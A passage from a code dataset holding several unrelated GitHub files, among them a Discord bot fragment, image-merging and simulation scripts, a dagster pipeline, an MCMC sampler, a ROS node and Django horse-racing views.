inline=False)\n newEmbed.add_field(name=f\"In City {getJsonDataArr['guild_data']['embed_data']['embedGangName']} Count: {len(embedGangCount)}\", value=\"\", inline=False)\n # for i in range(len(embedGangCount)):\n # newEmbed.add_field(name=\"\", value=f\"@{await bot.fetch_user(embedGangCount[i])}\", inline=False)\n\n newEmbed.set_footer(text=f\"Created by yne#2654. Last refresh at {now}\")\n \n message = await bot.get_channel(getJsonDataArr['guild_data']['normal_data']['channelId']).fetch_message(getJsonDataArr['guild_data']['normal_data']['message_id'])\n await message.edit(embed = newEmbed)\n\nasyncio.run(init_db())\n#asyncio.run(load_cogs())\n#asyncio.run(init_json())\nbot.run(config[\"token\"])\n","repo_name":"Yahye-Abdulle/5M-Player-Tracker","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27514876349","text":"import pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfile_dir = os.getcwd()\nmaster_dir = file_dir + '/../../' # gets master directory\nimg_dir = master_dir + 'Results/Ethane_Propane_Isotherms/'\nlist_im = [img_dir + 'Ethane_isotherm.png',\n img_dir + 'Propane_isotherm.png']\n\nimgs = [ PIL.Image.open(i).convert(\"RGBA\") for i in list_im ]\n\ndef get_concat_h(im1, im2):\n dst = Image.new('RGB', (im1.width + im2.width, im1.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (im1.width, 0))\n return dst\n\ndef get_concat_v(im1, im2):\n dst = Image.new('RGB', (im1.width, im1.height + im2.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (0, im1.height))\n return dst\n\ndef get_concat_h_cut(im1, im2):\n dst = Image.new('RGB', (im1.width + im2.width, min(im1.height, im2.height)))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (im1.width, 0))\n return dst\n\ndef get_concat_v_cut(im1, im2):\n dst = Image.new('RGB', (min(im1.width, im2.width), im1.height + im2.height))\n dst.paste(im1, (0, 0))\n dst.paste(im2, (0, im1.height))\n return dst\nget_concat_h_cut(imgs[0], imgs[1]).save('Figure_1.png')\n#get_concat_h_cut(imgs[0], 
imgs[1]).save('Figure_1.ps')","repo_name":"snurr-group/energygrid","sub_path":"Manuscript-Figures/Figure 1/mergefigure.py","file_name":"mergefigure.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38438471511","text":"\nfrom logic import (\n GRID_FREE, is_grid_block_free, block_size_coefficient, window_height, window_width, rows, cols,\n Mid, Child, Senior, Obstacle, ExitCell, ShapeEllipse,\n human_is_at_the_exit_cell, get_children_count, get_mids_count, get_senior_count\n)\nfrom maps import CLASS_214_MAP\nimport numpy as np\nimport pygame\nfrom pygame.locals import (\n K_RIGHT,\n KEYDOWN,\n QUIT,\n)\n\n\n# Configuration -> select map\nMAP = CLASS_214_MAP\n\n# Stats for grid\nTIME_TO_LEAVE_ALL_HUMANS = 0\n\n\nclass GridBlockTakenException(Exception):\n pass\n\n\ndef init_grid(rows, cols, humans, obstacles, exit_cell):\n grid = np.zeros(shape=(rows, cols), dtype=[('x', 'int'), ('y', 'int'), ('z', 'int')])\n grid.fill(GRID_FREE)\n\n # add obstacles to grid, no collisions here\n for ob in obstacles:\n ob.calculate_cells()\n for c in ob.get_cells():\n grid[c[0], c[1]] = ob.get_color()\n\n # add exit cell to grid\n if not is_grid_block_free(grid, exit_cell.pos_x, exit_cell.pos_y):\n raise GridBlockTakenException(\"Exit Cell could no be initialized at pos_x {} pos_y {} are already taken!\".format(\n exit_cell.pos_x, exit_cell.pos_y\n ))\n\n grid[exit_cell.pos_x, exit_cell.pos_y] = exit_cell.color\n\n # when human is close to exit cell we want to remove it from scene\n index_to_remove_human = [] \n\n # add humans to grid\n for i in range(len(humans)):\n humans[i].calculate_body_cells(grid, exit_cell)\n\n # check if any grid is so close to exit cell\n if human_is_at_the_exit_cell(humans[i], exit_cell):\n index_to_remove_human.append(i)\n\n # write color of the human to the grid\n for body_cell_pos in humans[i].get_body_cells():\n grid[body_cell_pos[0], body_cell_pos[1]] = humans[i].get_color()\n\n for i in index_to_remove_human:\n humans.pop(i)\n\n global TIME_TO_LEAVE_ALL_HUMANS\n if not humans:\n print(\"All humans has leaved the room in {} time_to_leave\".format(TIME_TO_LEAVE_ALL_HUMANS))\n else:\n TIME_TO_LEAVE_ALL_HUMANS += 1\n\n return grid\n\n\ndef update_grid(grid, humans, obstacles, exit_cell):\n for human in humans:\n human.move()\n\n rows, cols = grid.shape\n new_grid = init_grid(rows, cols, humans, obstacles, exit_cell)\n return new_grid\n\n\ndef draw_grid(screen, grid, w_width, w_height):\n rows, cols = grid.shape\n blockSize = ((min(w_width, w_height) - max(rows, cols)) / max(rows, cols)) * block_size_coefficient\n\n for x in range(1, rows - 1):\n for y in range(1, cols - 1):\n pos_x = (blockSize + 1) * x\n pos_y = (blockSize + 1) * y\n rect = pygame.Rect(pos_x, pos_y, blockSize, blockSize)\n pygame.draw.rect(screen, grid[x, y], rect, 0)\n\n pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n print(\"Window Size: {} x {}\".format(window_width, window_height))\n print(\"Cells: {} x {}\".format(rows, cols))\n pygame.init()\n screen = pygame.display.set_mode([window_width, window_height])\n screen.fill((128, 128, 128))\n clock = pygame.time.Clock()\n\n humans = MAP['humans']\n obstacles = MAP['obstacles']\n exit_cell = MAP['exit_cell']\n\n print(\"Map consists of {} obstacles, {} humans, where there are {} children, {} mids and {} seniors\".format(\n len(obstacles), len(humans), get_children_count(humans), get_mids_count(humans), get_senior_count(humans)\n ))\n\n grid = 
init_grid(rows, cols, humans, obstacles, exit_cell)\n\n draw_grid(screen, grid, window_width, window_height)\n\n running = True\n\n while running:\n for event in pygame.event.get(): \n if event.type == QUIT:\n running = False\n \n if event.type == KEYDOWN:\n if event.key == K_RIGHT:\n grid = update_grid(grid, humans, obstacles, exit_cell)\n draw_grid(screen, grid, window_width, window_height)\n\n pygame.quit()\n","repo_name":"navuyi/agent-systems-project","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37867747539","text":"def get_feat_d_from_ID(feat_ID, mut_row):\n feat_d = dict()\n for d in mut_row[\"genomic features\"]:\n if d[\"RegulonDB ID\"] == feat_ID:\n feat_d = d\n break\n return feat_d\n\n\ndef get_feat_d(json, RegulonDB_ID=None, name=None):\n feat_d = dict()\n for d in json:\n if (RegulonDB_ID and d[\"RegulonDB ID\"] == RegulonDB_ID) or (name and d[\"name\"] == name):\n feat_d = d\n break\n return feat_d\n\n\n\n# The below is currently only appropriate for genomic and genetic features \n# since it's not accounting for annotation types that don't have any entries\n# for mutations.\nimport pandas as pd\n\ndef get_feat_mut_cnt_df_from_links(mut_df, feat_col_name, link_col_name):\n f_cnt_df = pd.DataFrame(columns=[\"length\", \"observed mutation count\", \"name\"])\n for i, r in mut_df.iterrows():\n for f, links in r[link_col_name].items():\n f_d = get_feat_d(RegulonDB_ID=f, json=r[feat_col_name])\n if f_d[\"RegulonDB ID\"] in f_cnt_df.index:\n f_cnt_df.loc[f_d[\"RegulonDB ID\"], \"observed mutation count\"] += len(links)\n else:\n f_len = f_d[\"range\"][1] - f_d[\"range\"][0] + 1 \n df = pd.DataFrame({\"name\": f_d[\"name\"], \"length\": f_len, \"observed mutation count\": len(links)},\n index=[f_d[\"RegulonDB ID\"]]) # \"name\" column just for visual inspection\n f_cnt_df = f_cnt_df.append(df, sort=False)\n\n return f_cnt_df\n","repo_name":"Aletechdev/aledbmutil","sub_path":"feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18665728738","text":"from django import forms\n\nclass ModelNameForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = ModelName\n\t\tfields = '__all__'\n\t\texclude = ['slug', 'created', 'modified']\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ModelNameForm, self).__init__(*args, **kwargs)\n\t\tfor fieldname, field in self.fields.items():\n\t\t\tfield.widget.attrs.update({\n\t\t\t\t'class': 'form-control',\n\t\t\t\t'placeholder': '',\n\t\t\t})\n\n\tdef save(self, *args, **kwargs):\n\t\tsuper().save(*args, **kwargs)","repo_name":"itsDuncan/snippets","sub_path":"form-customization/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73453417475","text":"\"\"\"22. Verificar si un texto que termina en punto es un palíndromo (capicúa). Un texto es\npalíndromo si se lee lo mismo de izquierda a derecha o de derecha a izquierda. 
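(In English: check whether a text that ends in a period is a palindrome, i.e. whether it reads the same from left to right as from right to left.)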
Ej: “Amor\na roma”\n\"\"\"\n\ndef main():\n palindrome()\n\n\ndef palindrome():\n texto = input(\"Ingrese una frase terminada en punto, para verificar si es palíndrome: \")\n texto_limpio = texto.replace(\" \", \"\")\n palabra_lista = texto_limpio.replace(\".\", \"\")\n palabra = palabra_lista.lower()\n palabra_invertida = palabra[::-1]\n \n if palabra == palabra_invertida:\n print(\"Es palíndrome\")\n else:\n print(\"No es palíndrome\")\n \n\nif __name__ == '__main__':\n main()","repo_name":"isabelyb/Python_MinTIC_2021","sub_path":"week_2/ejercicios7_22palindrome.py","file_name":"ejercicios7_22palindrome.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3687563947","text":"import os\r\nfrom Bio import SeqIO\r\n\r\nlog = open('miniproject.log' , 'a')\r\ndef numLargeContigs():\r\n\r\n #we will be counting contings that are larger than 1000 base pairs\r\n\r\n\r\n contigFile = open('LargeContigs.txt','w')\r\n count = 0\r\n\r\n #initializing count and updating as each large contig is found\r\n #must supply this path because Spades stores the contigs in a subfolder\r\n data = SeqIO.parse('./SpadesAssembly/contigs.fasta','fasta')\r\n\r\n for record in data:\r\n x = len(record.seq)\r\n\r\n if x > 1000:\r\n count = count+1\r\n\r\n contigFile.write('> '+str(record.id) +'\\n' +str(record.seq) + '\\n')\r\n\r\n contigFile.close()\r\n log.write('There are '+str(count)+' contigs > 1000 bp in the assembly.')\r\n\r\nnumLargeContigs()\r\n\r\n \r\n","repo_name":"THEHANWOLF13/myrepo_mini_project","sub_path":"numLargeContigs.py","file_name":"numLargeContigs.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37984361725","text":"# Langevin or Hamiltonian MCMC version: overrides primitive proposal\n# Requires pytorch\n\nimport torch\n\nfrom HINTS import *\n\n\nclass HINTS_HMC(HINTS):\n def __init__(self, args, fn, noise_sd = 0.01):\n super().__init__(args, fn)\n self.epsilon = args.epsilon\n self.noise_sd = noise_sd\n #\n # HMC version ... 
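    # (Orientation sketch, hedged -- assuming metropolis_accept(x) accepts with probability min(1, exp(x)):\n    # the call below, metropolis_accept(vdiff - correction), is the Hamiltonian MH rule with\n    # vdiff = (v_prime - v)/T and correction = KE(p_new) - KE(p_old), where KE(p) = 0.5 * sum(p * p).)\n    #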
correction depends on knowing gradient at proposed state\n def primitive_move(self, model, index = 0, always_accept = False):\n scenarios = self.scenarios(0, index)\n #print(\"primitive\", index, len(scenarios))\n v = self.fn(model, scenarios, True) # puts a gradient into state as a side effect for HMC\n current = self.fn.sample_initial_state() # empty model\n # do this with no grad...\n correction = 0.0\n for f, f_prime in zip(model.parameters(), current.parameters()):\n # f.grad.data is the right shape to store momentum temporarily\n ###TO DO how big is f.grad.data compared with proposal noise\n f.grad.data = self.noise_sd * torch.randn(f.shape).to(f.device) + self.epsilon * 0.5 * f.grad.data # TO DO check gradient convention\n f_prime.data = f.data + 0.5 * self.epsilon * f.grad.data # add momentum\n correction -= 0.5 * (f.grad.data * f.grad.data).sum() # Kinetic energy term of -H\n # compute the value of the new state and its gradient\n v_prime = self.fn(current, scenarios, True) # need gdt again\n # store the new momentum in the grad entries of the candidate model\n for f, f_prime in zip(model.parameters(), current.parameters()):\n p_prime = f.grad.data + self.epsilon * 0.5 * f_prime.grad.data # TO DO check gradient convention\n correction += 0.5 * (p_prime * p_prime).sum() # kinetic energy term of H_new\n f.grad = None # must not reuse (unless we do more leapfrog steps)\n f_prime.grad = None\n \n # standard MHR / HINTS acceptance\n vdiff = (v_prime - v)/self.Ts[0] # PE change ... these are cached evaluations, no side effects\n #correction = 0 # TEMPOARY OVERRDE - SGD\n accept = True if always_accept else self.metropolis_accept(vdiff - correction)\n (self.acceptances if accept else self.rejections)[0] += 1\n return((current, vdiff) if accept else (model, 0.0))","repo_name":"mjstrens/HINTS","sub_path":"HINTS_torch.py","file_name":"HINTS_torch.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24177194351","text":"import pandas as pd\nimport numpy as np\nfrom dagster import pipeline, solid, execute_pipeline\nfrom forecasting_framework.utils.pre_processing import pre_process\n\n\n@solid\ndef read_commodity_data_raw():\n df_commodity = pd.read_excel(\"forecasting_framework/data/Rawdata.xls\")\n return df_commodity\n\n\n@solid\ndef read_rainfall_data_raw():\n df_rainfall = pd.read_csv(\"forecasting_framework/data/Rainfall_2020.csv\")\n return df_rainfall\n\n\n@solid\ndef process_data(df, rainfall_df):\n final_df = pre_process(df, rainfall_df)\n final_df.to_excel('forecasting_framework/data/processed_data.xlsx', index=False)\n return final_df\n\n\n@solid\ndef data_check(context, processed_df):\n mean_rainfall = processed_df['Rainfall'].mean()\n total_commodities = processed_df['COMM_NAME'].value_counts()\n total_category = processed_df['COMM_CATEGORY'].value_counts()\n context.log.info(f\"mean_rainfall: {mean_rainfall}\")\n context.log.info(f\"total_commodities: {total_commodities}\")\n context.log.info(f\"total_category: {total_category}\")\n\n\n@solid\ndef test_cases(processed_df):\n isinstance(processed_df['Date'], pd.datetime)\n isinstance(processed_df['COMM_NAME'], object)\n isinstance(processed_df['COMM_CODE'], int)\n isinstance(processed_df['COMM_CATEGORY'], object)\n isinstance(processed_df['COMM_WT'], float)\n isinstance(processed_df['Monthly Price'], float)\n isinstance(processed_df['Rainfall'], float)\n\n\n@pipeline\ndef data_pipeline():\n commodity_data = 
read_commodity_data_raw()\n rainfall_data = read_rainfall_data_raw()\n processed_data = process_data(commodity_data, rainfall_data)\n data_check(processed_data)\n test_cases(processed_data)\n\n\nif __name__ == \"__main__\":\n result = execute_pipeline(data_pipeline)\n","repo_name":"sayantikabanik/FP2","sub_path":"forecasting_framework/data/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38064443087","text":"res = 0\n\n\ndef check(mid):\n cnt = 0\n here = -1\n for p in w:\n if here <= p:\n cnt += 1\n here = p+mid\n return cnt >= m\n\n\ndef bs(s, e):\n global res\n for i in range(100):\n mid = (s+e) >> 1\n if check(mid):\n s = mid+1\n res = max(res, mid)\n else:\n e = mid-1\n\n\nn, m, k = map(int, input().split())\nw = list(map(int, input().split()))\nbs(0, w[-1])\nr = ''\ncnt = 0\nhere = -1\nfor p in w:\n if here <= p and cnt < m:\n r += '1'\n here = p+res\n cnt += 1\n else:\n r += '0'\nprint(r)\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1508.py","file_name":"bj1508.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3997212407","text":"import logging\n\nfrom .common import standard_request\n\nlogger = logging.getLogger(__name__)\n\n\ndef create(manga_id, file_url, location=None, state='ready'):\n return standard_request(\n model='file',\n method='create',\n params={\n 'manga_id': manga_id,\n 'url': file_url,\n 'location': location,\n 'state': state,\n },\n logger=logger,\n )\n\n\ndef read(file_id):\n \"\"\"\n {\n \"url\": \"https://manga.madokami.al/Manga/N/NE/NEKO/Neko Musume Michikusa Nikki/Neko Musume Michikusa Nikki - v10 c58 [batoto - placeholder scanlations].zip\",\n \"location\": \"/data/raw_files/2/40_-_Neko_Musume_Michikusa_Nikki_-_v10_c58_[batoto_-_placeholder_scanlations].zip\",\n \"time_created\": \"2017-11-14T19:26:14\",\n \"ignore\": false,\n \"manga_id\": 2,\n \"downloaded\": true,\n \"id\": 40,\n \"parsed\": true,\n \"time_updated\": \"2017-11-16T22:00:59\"\n }\n \"\"\"\n return standard_request(\n model='file',\n method='read',\n params={\n 'id': file_id,\n },\n logger=logger,\n )\n\n\ndef update(file_id, manga_id=None, file_url=None, location=None, state=None):\n return standard_request(\n model='file',\n method='update',\n params={\n 'id': file_id,\n 'manga_id': manga_id,\n 'url': file_url,\n 'location': location,\n 'state': state,\n },\n logger=logger,\n )\n\n\ndef delete(file_id):\n return standard_request(\n model='file',\n method='delete',\n params={\n 'id': file_id,\n },\n logger=logger,\n )\n\n\ndef index(manga_id=None, state=None):\n return standard_request(\n model='file',\n method='index',\n params={\n 'manga_id': manga_id,\n 'state': state,\n },\n logger=logger,\n )\n","repo_name":"antonpaquin/Homulili","sub_path":"src/backend/flask_interface/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44071643491","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ('contacts', '0009_auto_20150910_2158'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='properties',\n name='group',\n 
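# Note: default=1 here is a one-off value used only to backfill existing rows;\n            # preserve_default=False below removes it from the final field definition.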
field=models.ForeignKey(verbose_name='groupe', default=1, to='auth.Group', related_name='properties'),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"vegaelle/pyru","sub_path":"contacts/migrations/0010_properties_group.py","file_name":"0010_properties_group.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24404577421","text":"import serial\nimport time\n\nser = serial.Serial(\"/dev/ttyUSB0\", 115200)\nser.flushInput()\ntime.sleep(1)\n\nstart = \"!start1590\\n\"\ninits = \"!inits0.5\\n\"\nkp = \"!kp0.01\\n\"\nkd = \"!kd0.01\\n\"\nstraight = \"!straight1500\\n\"\nser.write(start.encode())\nser.write(inits.encode())\nser.write(kp.encode())\nser.write(kd.encode())\nser.write(straight.encode())\n\n\ndef drive(value):\n    command = \"!speed\" + str(value) + \"\\n\"\n    ser.write(command.encode())\n\n\ndef steer(value):\n    command = \"!steering\" + str(value) + \"\\n\"\n    ser.write(command.encode())\n\nprint(\"right\")\nsteer(15.0)\ntime.sleep(2)\nprint(\"left\")\nsteer(-15.0)\ntime.sleep(2)\nprint(\"go\")\ndrive(1)\ntime.sleep(2)\nprint(\"stop\")\ndrive(0)\ntime.sleep(2)","repo_name":"kalinnorman/SDCars","sub_path":"class_code/driveTesting.py","file_name":"driveTesting.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10607465075","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, sys, time, math\nfrom sensor_msgs.msg import CompressedImage\n\n\nclass CrosspointRotation():\n    def __init__(self):\n        self.photo = np.array([])  # starts empty; filled by the camera callback\n\n        self.count_callback = 0\n        self.floorcam_subscriber = rospy.Subscriber('/pi_floorcam/image_raw/compressed',\n                                                    CompressedImage, self.callback_floorcam)\n\n    def callback_floorcam(self, _photo):\n        np_arr = np.frombuffer(_photo.data, np.uint8)\n        image_cv = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n        image_cv = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)\n        self.photo = image_cv\n        self.count_callback += 1\n\n\nif __name__ == \"__main__\":\n    try:\n        rospy.init_node('hengel_crosspoint_rotation')\n        CrosspointRotation()\n        rospy.spin()\n    except Exception as e:\n        print(e)\n        rospy.loginfo(\"shutdown program\")\n","repo_name":"bkjung/hengel_ros","sub_path":"hengel_navigation/scripts/crosspoint_rotation.py","file_name":"crosspoint_rotation.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35023901119","text":"from django.shortcuts import render\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom .models import JornadaH, Carrera, DetallesCarrera, ActualizarEstatusCarrerasCorriendo, ActualizarEstatusCarrerasCorriendoPendientes\nfrom .forms import (IncluirCarreraForm, IncluirJornadaForm, ActualizarJornadaForm, RegistrarDetallesForm, \n\t\t\t\t\tActualizarDetallesForm, ActualizarCarreraForm, FinalizarCarreraForm, ListaCarreraForm,\n                    FinalizarDetallesForm, RegistrarResultadosForm)\nfrom flyhorse.mixin import AuthenticatedEncarMixin\nfrom datetime import datetime\nfrom pytz import timezone\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apps.apuesta.models import Apuesta, TipoApuesta, DetalleApuesta\nfrom apps.monedavirtual.models import
Transaccion\nfrom apps.usuario.models import User\n\n# Create your views here.\n\"\"\"\nAPS para gestionar el cambio automático de estado de las carreras\n\"\"\"\n#Necesito garantizar de alguna manera que este código se ejecute cada vez que se encienda el server.\n#Por eso está acá afuera, sin ninguna función ni nada.\n#Ahora, como el APS no ofrece persistencia de la data, tenemos que consultar en la BD los trabajos\n#que están pendientes.\n#Se guardan en la tabla Job. Tienen estatus, fecha, hora y un ID único.\n#A partir de esto, y cada vez que se ejecuta el server, se cargan a un scheduler único todos los\n#trabajos pendientes, permitiendo añadir más si es necesario.\nscheduler = BackgroundScheduler() #Declaro el scheduler\ntz = timezone('America/Caracas') #Zona horaria porque el APS se vuelve un despelote sin eso\njobs = Carrera.objects.filter(id_jh__fecha__gte=datetime.now(tz).date(),hora__gte=datetime.now(tz).time(),estatus='a') #Consulto si hay trabajos que están pendientes en la BD\nif jobs:\n\tfor job in jobs:\n\t\tf = job.id_jh.fecha.strftime(\"%Y-%m-%d\")\n\t\th = job.hora.strftime(\"%H:%M:00\")\n\t\tfh = f + ' ' + h\n\t\tscheduler.add_job(ActualizarEstatusCarrerasCorriendo,'date', run_date=fh, timezone='America/Caracas') #Los cargo al scheduler interno\njobs = Carrera.objects.filter(id_jh__fecha__lte=datetime.now(tz).date(),hora__lte=datetime.now(tz).time(),estatus='a') #Consulto si hay trabajos \"vencidos\" en la BD\nif jobs:\n\tfor job in jobs:\n\t\tActualizarEstatusCarrerasCorriendoPendientes(job.id_jh.fecha, job.hora) #No los cargo: los actualizo de una vez\nscheduler.print_jobs() #Imprimirlos, para confirmar que todo marcha bien.\n#scheduler.start() #Inicio. Si no inicio no sirve de nada porque no habrá nadie esperando para ejecutar el método\n\n\"\"\"\nCARRERAS\n\n\"\"\"\n\nclass IncluirCarrera(AuthenticatedEncarMixin, CreateView):\n\tmodel = Carrera\n\tform_class = IncluirCarreraForm\n\ttemplate_name = \"carrera/incluirC.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.pk, 'modal': 'show'})\n\n#Es evidente que hay que crear el trabajo con el APS cada vez que se incluye una carrera.\n#Por eso está la sobrecarga del form_valid. 
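#(Editorial sketch of the scheduling pattern used in this module -- APScheduler's add_job with the\n#'date' trigger accepts a \"YYYY-MM-DD HH:MM:SS\" run_date string:\n#    fh = fecha.strftime(\"%Y-%m-%d\") + ' ' + hora.strftime(\"%H:%M:00\")\n#    scheduler.add_job(ActualizarEstatusCarrerasCorriendo, 'date', run_date=fh, timezone='America/Caracas')\n#The same job is mirrored to the database so pending jobs survive a server restart.)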
Este crea el trabajo tanto en BD como en el scheduler interno.\n\tdef form_valid(self, form): \n\t\tinstance = form.save(commit=False)\n\t\tfecha = form.cleaned_data['id_jh'].fecha\n\t\tfecha = fecha.strftime(\"%Y-%m-%d\")\n\t\thora = form.cleaned_data['hora'].strftime(\"%H:%M:00\")\n\t\tfh = fecha + ' ' + hora\n\t\tprint(fh)\n\t\ttrabajo = Job()\n\t\ttrabajo.fecha = fecha\n\t\ttrabajo.hora = hora\n\t\ttrabajo.save()\n\t\tscheduler.add_job(ActualizarEstatusCarrerasCorriendo,'date', run_date=fh, timezone='America/Caracas')\n\t\tscheduler.print_jobs()\n\t\treturn super().form_valid(form)\t\n\t\t\n\nclass ListaCarrera(AuthenticatedEncarMixin, ListView):\n\tmodel = Carrera\n\ttemplate_name = \"carrera/listaCr.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\test = self.kwargs.get('estatus')\n\t\tcontext = super(ListaCarrera, self).get_context_data(**kwargs)\n\t\tcontext[\"object_list\"] = Carrera.objects.filter(id_jh__estatus='a')\n\t\treturn context\n\nclass ActualizarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = ActualizarCarreraForm\n\ttemplate_name = \"carrera/actualizarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\nclass FinalizarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = \"carrera/finalizarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\nclass EliminarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = \"carrera/eliminarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\n\"\"\"\nJORNADA\n\"\"\"\n\nclass IncluirJornada(AuthenticatedEncarMixin, CreateView):\n\tmodel = JornadaH\n\tform_class = IncluirJornadaForm\n\ttemplate_name = \"jornada/incluirJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(IncluirJornada, self).get_context_data(**kwargs)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('incluirJh', kwargs={'modal': 'show'})\n\nclass ListaJornada(AuthenticatedEncarMixin, ListView):\n\tmodel = JornadaH\n\ttemplate_name = \"jornada/listaJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(ListaJornada, self).get_context_data(**kwargs)\n\t\tcontext['jornadas'] = JornadaH.objects.filter(estatus='a')\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\n\nclass ActualizarJornada(AuthenticatedEncarMixin, UpdateView):\n\tmodel = JornadaH\n\tform_class = ActualizarJornadaForm\n\ttemplate_name = \"jornada/actualizarJ.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('consJh', kwargs={'pk': self.object.id ,'modal': 'show'})\n\n\n\nclass EliminarJornada(AuthenticatedEncarMixin, DeleteView):\n\tmodel = JornadaH\n\ttemplate_name = \"jornada/eliminarJ.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('listaJh', kwargs={'modal': 'show'})\n\nclass ConsultarJornada(AuthenticatedEncarMixin, ListView):\n\tmodel = JornadaH\n\tsecond_model = Carrera\n\ttemplate_name = \"jornada/consultarJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ConsultarJornada, self).get_context_data(**kwargs)\n\t\tcontext['carreras'] = Carrera.objects.filter(id_jh = pk)\n\t\tcontext['jornadah'] = JornadaH.objects.get(id = pk)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\t\n\n\n\"\"\"\nDETALLES\n\"\"\"\nclass ListaDetallesC(AuthenticatedEncarMixin, ListView):\n\tmodel = 
DetallesCarrera\n\tsecond_model = Carrera\n\ttemplate_name = \"carrera/listdetallesC.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ListaDetallesC, self).get_context_data(**kwargs)\n\t\tcontext['competidores'] = DetallesCarrera.objects.filter(id_carr=pk).order_by('numero', '-estatus')\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\n\t\n\t\t\nclass RegistrarDetalles(AuthenticatedEncarMixin, CreateView):\n\tmodel = DetallesCarrera\n\tsecond_model = Carrera\n\tform_class = RegistrarDetallesForm\n\ttemplate_name = \"carrera/incluirD.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(RegistrarDetalles, self).get_context_data(**kwargs)\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\treturn context\n\n\tdef get_success_url(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': pk,'modal':'show'})\n\nclass ActualizarDetalle(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = ActualizarDetallesForm\n\ttemplate_name = 'carrera/actualizarD.html'\n\t\n\tdef 